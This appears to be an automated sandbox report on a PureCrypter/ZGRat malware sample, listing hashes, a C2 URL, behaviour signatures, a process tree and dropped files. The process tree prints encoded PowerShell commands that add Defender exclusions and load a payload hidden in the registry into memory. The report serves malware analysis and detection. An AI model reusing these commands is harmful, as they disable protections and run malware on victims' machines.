Analysis

  • max time kernel
    147s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2023 17:34

General

  • Target

    a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe

  • Size

    916KB

  • MD5

    b2e2f7e938326213778c21bac8a07b0c

  • SHA1

    0e2e02c20665b2b7a0f700b31a9f8c80e736f3f4

  • SHA256

    a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3

  • SHA512

    0f50989152c77eff1dc80e63d3e83a8818db1b0d67653a102be631c32edc4c2799c7656040761a18210a1353ce436ca852a7ff629f4a0920b5603a77a866f906

  • SSDEEP

    24576:5Ru+5TGtOR/f/MtTU7Qv2Q1QRTT3GQqReCxY/Bc:57TG4/H6OQ1g3GQvw

Malware Config

Extracted

Family

purecrypter

C2

http://verifycleansecurity.com/seven/Jmdhajdggaf.vdf

Signatures

  • Detect ZGRat V1 14 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe
    "C:\Users\Admin\AppData\Local\Temp\a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe
      "C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe
        "C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3996
        • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe
          C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:5108
      • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe
        C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
    • C:\Users\Admin\AppData\Local\Temp\a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe
      C:\Users\Admin\AppData\Local\Temp\a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:316
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFIAZQBhAGQATwBuAGwAeQBcAEkAcwBDAG8AbQBwAGwAZQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFIAZQBhAGQATwBuAGwAeQBcAEkAcwBDAG8AbQBwAGwAZQB0AGUAZAAuAGUAeABlAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3504
  • C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe
    C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe
      C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:644
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:512
  • C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe
    C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe
      C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1136
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3540
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:5072

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Items\bnmtc\Source.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cesirbounf.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InstallUtil.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IsCompleted.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Source.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Source.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aspnet_compiler.exe.log

    Filesize

    1KB

    MD5

    638ba0507fa15cd4462cdd879c2114fa

    SHA1

    f23dfc22ea05f6abb8f9aa11a855ef8f3c51d7f2

    SHA256

    f91ebecc8963ff1840636f0c2a8f5350beb6eebab8b7d99068ad0b19bcccb478

    SHA512

    23d440dc8ecfa6c43e89895de038c564bb5e09174a6818a5952d5d589296a6ae77e71a4fc5de3773a6bf27aebb69bdb670f2a2609cf8658668759b50dffc8520

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sbvtdsfm.exe.log

    Filesize

    1KB

    MD5

    8b08e283e809a6b038952465bcc729d9

    SHA1

    9316f4682f7502d38079f5fca43577430fa860e9

    SHA256

    b8129c7f6e5a6db4cc6e61e10b890cd3a1217660f5404be30c88791ba37cfc15

    SHA512

    7b35e051a4217c2d672308260897874cb41adec7ac583023b1b018607b555552e977ea5d0ef568601963c3bfed75cb72121bd275271e5a06682a465ebb3e6c9a

  • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Temp\Cesirbounf.exe

    Filesize

    876KB

    MD5

    7e4841bdd2eb87d67f3421e52d9ee0da

    SHA1

    5304f16025867bea76f9bd304501bd52a32b9d00

    SHA256

    f9ce5404b33934c9b7b5df7dd753e934e64bceecfb0813caf4644c4f14d19e3b

    SHA512

    e9a4529abf2f92d39b6b81d81cb59cb1d2b867842cef8780bcf8787f0b3f398fb020017c118a9ac4388d0c18edb29e288c8b08624d3b7964708d3f9c4ecb8fc7

  • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe

    Filesize

    5KB

    MD5

    3579b7a93a267bb4f8ec99c820f4db60

    SHA1

    c2abece66bb649648392e737b2df9a6d0dfe45a6

    SHA256

    9ee03e9109d88ed158aae703fbbe8187927493c9712e14b08763c44ff0d2c106

    SHA512

    7449676d8626f2e6a4673a94ad3b3f8e5682f6d6fbb12aa5b6a528ed50db4e6bcd46a513868b3a38674ce26fdd5e5ea6e8d1d2b1b429870747e8de3678403b19

  • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe

    Filesize

    5KB

    MD5

    3579b7a93a267bb4f8ec99c820f4db60

    SHA1

    c2abece66bb649648392e737b2df9a6d0dfe45a6

    SHA256

    9ee03e9109d88ed158aae703fbbe8187927493c9712e14b08763c44ff0d2c106

    SHA512

    7449676d8626f2e6a4673a94ad3b3f8e5682f6d6fbb12aa5b6a528ed50db4e6bcd46a513868b3a38674ce26fdd5e5ea6e8d1d2b1b429870747e8de3678403b19

  • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe

    Filesize

    5KB

    MD5

    3579b7a93a267bb4f8ec99c820f4db60

    SHA1

    c2abece66bb649648392e737b2df9a6d0dfe45a6

    SHA256

    9ee03e9109d88ed158aae703fbbe8187927493c9712e14b08763c44ff0d2c106

    SHA512

    7449676d8626f2e6a4673a94ad3b3f8e5682f6d6fbb12aa5b6a528ed50db4e6bcd46a513868b3a38674ce26fdd5e5ea6e8d1d2b1b429870747e8de3678403b19

  • C:\Users\Admin\AppData\Local\Temp\Sbvtdsfm.exe

    Filesize

    5KB

    MD5

    3579b7a93a267bb4f8ec99c820f4db60

    SHA1

    c2abece66bb649648392e737b2df9a6d0dfe45a6

    SHA256

    9ee03e9109d88ed158aae703fbbe8187927493c9712e14b08763c44ff0d2c106

    SHA512

    7449676d8626f2e6a4673a94ad3b3f8e5682f6d6fbb12aa5b6a528ed50db4e6bcd46a513868b3a38674ce26fdd5e5ea6e8d1d2b1b429870747e8de3678403b19

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3dbdq2f5.cts.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe

    Filesize

    916KB

    MD5

    b2e2f7e938326213778c21bac8a07b0c

    SHA1

    0e2e02c20665b2b7a0f700b31a9f8c80e736f3f4

    SHA256

    a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3

    SHA512

    0f50989152c77eff1dc80e63d3e83a8818db1b0d67653a102be631c32edc4c2799c7656040761a18210a1353ce436ca852a7ff629f4a0920b5603a77a866f906

  • C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe

    Filesize

    916KB

    MD5

    b2e2f7e938326213778c21bac8a07b0c

    SHA1

    0e2e02c20665b2b7a0f700b31a9f8c80e736f3f4

    SHA256

    a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3

    SHA512

    0f50989152c77eff1dc80e63d3e83a8818db1b0d67653a102be631c32edc4c2799c7656040761a18210a1353ce436ca852a7ff629f4a0920b5603a77a866f906

  • C:\Users\Admin\AppData\Roaming\IsReadOnly\IsCompleted.exe

    Filesize

    916KB

    MD5

    b2e2f7e938326213778c21bac8a07b0c

    SHA1

    0e2e02c20665b2b7a0f700b31a9f8c80e736f3f4

    SHA256

    a19d26160936d45993c7f51ba45422efadefe03ff3819e28ff52482334fa65c3

    SHA512

    0f50989152c77eff1dc80e63d3e83a8818db1b0d67653a102be631c32edc4c2799c7656040761a18210a1353ce436ca852a7ff629f4a0920b5603a77a866f906

  • memory/316-22-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/316-59-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/316-32-0x000002EF6A1A0000-0x000002EF6A1F6000-memory.dmp

    Filesize

    344KB

  • memory/316-31-0x000002EF4FE60000-0x000002EF4FE68000-memory.dmp

    Filesize

    32KB

  • memory/316-33-0x000002EF4FF60000-0x000002EF4FFB4000-memory.dmp

    Filesize

    336KB

  • memory/316-55-0x000002EF4FED0000-0x000002EF4FEE0000-memory.dmp

    Filesize

    64KB

  • memory/316-54-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/316-24-0x000002EF4FED0000-0x000002EF4FEE0000-memory.dmp

    Filesize

    64KB

  • memory/316-21-0x000002EF69F30000-0x000002EF6A030000-memory.dmp

    Filesize

    1024KB

  • memory/316-18-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

  • memory/512-82-0x0000029B535F0000-0x0000029B53600000-memory.dmp

    Filesize

    64KB

  • memory/512-85-0x0000029B535F0000-0x0000029B53600000-memory.dmp

    Filesize

    64KB

  • memory/512-81-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/512-84-0x0000029B535F0000-0x0000029B53600000-memory.dmp

    Filesize

    64KB

  • memory/512-470-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/644-70-0x000001B40A200000-0x000001B40A210000-memory.dmp

    Filesize

    64KB

  • memory/644-77-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/644-74-0x000001B40A200000-0x000001B40A210000-memory.dmp

    Filesize

    64KB

  • memory/644-69-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/644-75-0x000001B40A200000-0x000001B40A210000-memory.dmp

    Filesize

    64KB

  • memory/644-72-0x000001B422C70000-0x000001B422CC4000-memory.dmp

    Filesize

    336KB

  • memory/768-83-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/768-1-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/768-3-0x0000027485B60000-0x0000027485B70000-memory.dmp

    Filesize

    64KB

  • memory/768-5-0x000002749FF30000-0x00000274A0000000-memory.dmp

    Filesize

    832KB

  • memory/768-6-0x00000274A0000000-0x00000274A004C000-memory.dmp

    Filesize

    304KB

  • memory/768-23-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/768-2-0x000002749FD70000-0x000002749FE5A000-memory.dmp

    Filesize

    936KB

  • memory/768-4-0x000002749FE60000-0x000002749FF32000-memory.dmp

    Filesize

    840KB

  • memory/768-76-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/768-0-0x00000274856D0000-0x00000274857BC000-memory.dmp

    Filesize

    944KB

  • memory/1520-137-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-110-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-106-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-121-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-167-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-156-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-150-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-146-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-141-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-97-0x0000000000400000-0x00000000004B6000-memory.dmp

    Filesize

    728KB

  • memory/1520-162-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-135-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-100-0x00000000054F0000-0x00000000055B2000-memory.dmp

    Filesize

    776KB

  • memory/1520-117-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-102-0x00000000054E0000-0x00000000054F0000-memory.dmp

    Filesize

    64KB

  • memory/1520-129-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-105-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-107-0x0000000074D50000-0x0000000075500000-memory.dmp

    Filesize

    7.7MB

  • memory/1520-126-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-119-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-123-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1520-114-0x00000000054F0000-0x00000000055AD000-memory.dmp

    Filesize

    756KB

  • memory/1588-71-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/1588-63-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/1588-64-0x000001D3B1330000-0x000001D3B1340000-memory.dmp

    Filesize

    64KB

  • memory/2220-27-0x0000000005330000-0x00000000058D4000-memory.dmp

    Filesize

    5.6MB

  • memory/2220-28-0x0000000004D80000-0x0000000004E12000-memory.dmp

    Filesize

    584KB

  • memory/2220-60-0x0000000004D10000-0x0000000004D20000-memory.dmp

    Filesize

    64KB

  • memory/2220-115-0x0000000074D50000-0x0000000075500000-memory.dmp

    Filesize

    7.7MB

  • memory/2220-36-0x0000000006530000-0x00000000066D2000-memory.dmp

    Filesize

    1.6MB

  • memory/2220-29-0x0000000004D10000-0x0000000004D20000-memory.dmp

    Filesize

    64KB

  • memory/2220-25-0x0000000074D50000-0x0000000075500000-memory.dmp

    Filesize

    7.7MB

  • memory/2220-56-0x0000000074D50000-0x0000000075500000-memory.dmp

    Filesize

    7.7MB

  • memory/2220-35-0x0000000006390000-0x0000000006534000-memory.dmp

    Filesize

    1.6MB

  • memory/2220-26-0x0000000000490000-0x0000000000498000-memory.dmp

    Filesize

    32KB

  • memory/2220-34-0x0000000006060000-0x000000000621C000-memory.dmp

    Filesize

    1.7MB

  • memory/2220-37-0x0000000006920000-0x0000000006986000-memory.dmp

    Filesize

    408KB

  • memory/2220-30-0x0000000004D50000-0x0000000004D5A000-memory.dmp

    Filesize

    40KB

  • memory/3504-53-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/3504-40-0x00000150AC010000-0x00000150AC032000-memory.dmp

    Filesize

    136KB

  • memory/3504-50-0x00000150ABF90000-0x00000150ABFA0000-memory.dmp

    Filesize

    64KB

  • memory/3504-39-0x00000150ABF90000-0x00000150ABFA0000-memory.dmp

    Filesize

    64KB

  • memory/3504-38-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/3996-104-0x0000016076760000-0x0000016076840000-memory.dmp

    Filesize

    896KB

  • memory/3996-140-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/3996-99-0x00000160741C0000-0x00000160742A2000-memory.dmp

    Filesize

    904KB

  • memory/3996-101-0x00007FFB2F740000-0x00007FFB30201000-memory.dmp

    Filesize

    10.8MB

  • memory/3996-113-0x0000016076A70000-0x0000016076B36000-memory.dmp

    Filesize

    792KB

  • memory/3996-109-0x0000016076940000-0x0000016076A08000-memory.dmp

    Filesize

    800KB

  • memory/3996-103-0x0000016076840000-0x0000016076850000-memory.dmp

    Filesize

    64KB

  • memory/5108-125-0x0000000000400000-0x00000000004A8000-memory.dmp

    Filesize

    672KB

  • memory/5108-161-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-164-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-168-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-170-0x0000022BDE080000-0x0000022BDE15F000-memory.dmp

    Filesize

    892KB

  • memory/5108-134-0x0000022BDE190000-0x0000022BDE1A0000-memory.dmp

    Filesize

    64KB

